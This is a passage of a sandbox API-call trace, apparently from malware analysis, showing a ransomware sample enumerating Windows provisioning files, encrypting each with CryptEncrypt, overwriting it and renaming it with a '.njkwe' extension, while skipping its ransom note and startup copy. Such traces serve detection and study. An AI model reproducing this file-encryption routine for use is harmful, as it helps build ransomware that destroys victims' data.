(lpString1="509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0081.550] lstrcmpiW (lpString1="509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0081.550] lstrcmpiW (lpString1="509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0081.550] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0081.550] StrStrIW (lpFirst="509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0081.550] lstrcmpW (lpString1="509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.550] lstrcmpW (lpString1="509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0081.550] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\509__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.550] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\509__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.550] GetTickCount () returned 0x1154b2e [0081.550] GetTickCount () returned 0x1154b2e [0081.550] GetTickCount () returned 0x1154b2e [0081.550] GetTickCount () returned 0x1154b2e [0081.550] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.550] GetProcessHeap () returned 0xbe0000 [0081.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.550] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x1db, lpOverlapped=0x0) returned 1 [0081.551] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.551] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x1db, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x1db, lpOverlapped=0x0) returned 1 [0081.552] GetProcessHeap () returned 0xbe0000 [0081.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.552] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.552] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.552] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.552] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.552] CloseHandle (hObject=0x43c) returned 1 [0081.552] GetProcessHeap () returned 0xbe0000 [0081.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.553] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0081.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\509__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\509__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\509__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.553] GetProcessHeap () returned 0xbe0000 [0081.553] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.553] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9026e179, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9026e179, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9026e179, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", cAlternateFileName="50__CO~1.PRO")) returned 1 [0081.553] lstrcmpiW (lpString1="50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.553] lstrcmpiW (lpString1="50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.553] lstrcmpiW (lpString1="50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.553] lstrcmpiW (lpString1="50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.553] lstrcmpiW (lpString1="50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.554] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml") returned 185 [0081.554] StrStrIW (lpFirst="50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.554] lstrcmpW (lpString1="50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.554] lstrcmpW (lpString1="50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.554] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\50__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.554] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\50__connections_cellular_bh telekom bosnia (bosnia and herzegovina)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.554] GetTickCount () returned 0x1154b2e [0081.554] GetTickCount () returned 0x1154b2e [0081.554] GetTickCount () returned 0x1154b2e [0081.554] GetTickCount () returned 0x1154b2e [0081.554] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.554] GetProcessHeap () returned 0xbe0000 [0081.554] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.554] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2e4, lpOverlapped=0x0) returned 1 [0081.569] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.569] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2e4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2e4, lpOverlapped=0x0) returned 1 [0081.569] GetProcessHeap () returned 0xbe0000 [0081.569] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.569] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.569] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.569] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.569] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.569] CloseHandle (hObject=0x43c) returned 1 [0081.570] GetProcessHeap () returned 0xbe0000 [0081.570] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.570] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 205 [0081.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\50__connections_cellular_bh telekom bosnia (bosnia and herzegovina)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\50__Connections_Cellular_BH Telekom Bosnia (Bosnia and Herzegovina)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\50__connections_cellular_bh telekom bosnia (bosnia and herzegovina)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.570] GetProcessHeap () returned 0xbe0000 [0081.570] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.570] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9123a200, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9123a200, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9123a200, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1c7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml", cAlternateFileName="510__C~1.PRO")) returned 1 [0081.571] lstrcmpiW (lpString1="510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml", lpString2="Windows") returned -1 [0081.571] lstrcmpiW (lpString1="510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml", lpString2="$Recycle.bin") returned 1 [0081.571] lstrcmpiW (lpString1="510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml", lpString2="System Volume Information") returned -1 [0081.571] lstrcmpiW (lpString1="510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml", lpString2="Program Files") returned -1 [0081.571] lstrcmpiW (lpString1="510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml", lpString2="Program Files (x86)") returned -1 [0081.571] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml") returned 158 [0081.571] StrStrIW (lpFirst="510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml", lpSrch=".njkwe") returned 0x0 [0081.571] lstrcmpW (lpString1="510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.571] lstrcmpW (lpString1="510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml", lpString2="taridd") returned -1 [0081.571] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\510__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.571] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\510__cellular_persimsettings_$(__iccid)_networkblocklist.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.571] GetTickCount () returned 0x1154b3e [0081.571] GetTickCount () returned 0x1154b3e [0081.571] GetTickCount () returned 0x1154b3e [0081.571] GetTickCount () returned 0x1154b3e [0081.571] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.572] GetProcessHeap () returned 0xbe0000 [0081.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.572] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x1c7, lpOverlapped=0x0) returned 1 [0081.572] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.573] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x1c7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x1c7, lpOverlapped=0x0) returned 1 [0081.573] GetProcessHeap () returned 0xbe0000 [0081.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.573] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.573] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.573] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.574] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.574] CloseHandle (hObject=0x43c) returned 1 [0081.574] GetProcessHeap () returned 0xbe0000 [0081.574] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.574] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0081.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\510__cellular_persimsettings_$(__iccid)_networkblocklist.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\510__Cellular_PerSimSettings_$(__ICCID)_NetworkBlockList.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\510__cellular_persimsettings_$(__iccid)_networkblocklist.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.574] GetProcessHeap () returned 0xbe0000 [0081.574] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.575] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9123a200, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9123a200, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9123a200, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml", cAlternateFileName="511__C~1.PRO")) returned 1 [0081.575] lstrcmpiW (lpString1="511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml", lpString2="Windows") returned -1 [0081.575] lstrcmpiW (lpString1="511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml", lpString2="$Recycle.bin") returned 1 [0081.575] lstrcmpiW (lpString1="511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml", lpString2="System Volume Information") returned -1 [0081.575] lstrcmpiW (lpString1="511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml", lpString2="Program Files") returned -1 [0081.575] lstrcmpiW (lpString1="511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml", lpString2="Program Files (x86)") returned -1 [0081.575] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml") returned 154 [0081.575] StrStrIW (lpFirst="511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml", lpSrch=".njkwe") returned 0x0 [0081.575] lstrcmpW (lpString1="511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.575] lstrcmpW (lpString1="511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml", lpString2="taridd") returned -1 [0081.575] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\511__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.575] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\511__cellular_persimsettings_$(__iccid)_simblocklist.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.575] GetTickCount () returned 0x1154b3e [0081.575] GetTickCount () returned 0x1154b3e [0081.575] GetTickCount () returned 0x1154b3e [0081.575] GetTickCount () returned 0x1154b3e [0081.575] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.575] GetProcessHeap () returned 0xbe0000 [0081.575] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.576] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x1c3, lpOverlapped=0x0) returned 1 [0081.576] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.577] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x1c3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x1c3, lpOverlapped=0x0) returned 1 [0081.577] GetProcessHeap () returned 0xbe0000 [0081.577] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.577] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.577] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.577] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.577] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.577] CloseHandle (hObject=0x43c) returned 1 [0081.578] GetProcessHeap () returned 0xbe0000 [0081.578] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.578] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml_r00t_{3sXlE5}.njkwe") returned 174 [0081.578] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\511__cellular_persimsettings_$(__iccid)_simblocklist.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\511__Cellular_PerSimSettings_$(__ICCID)_SIMBlockList.provxml_r00t_{3sXlE5}.njkwe" (normalized: 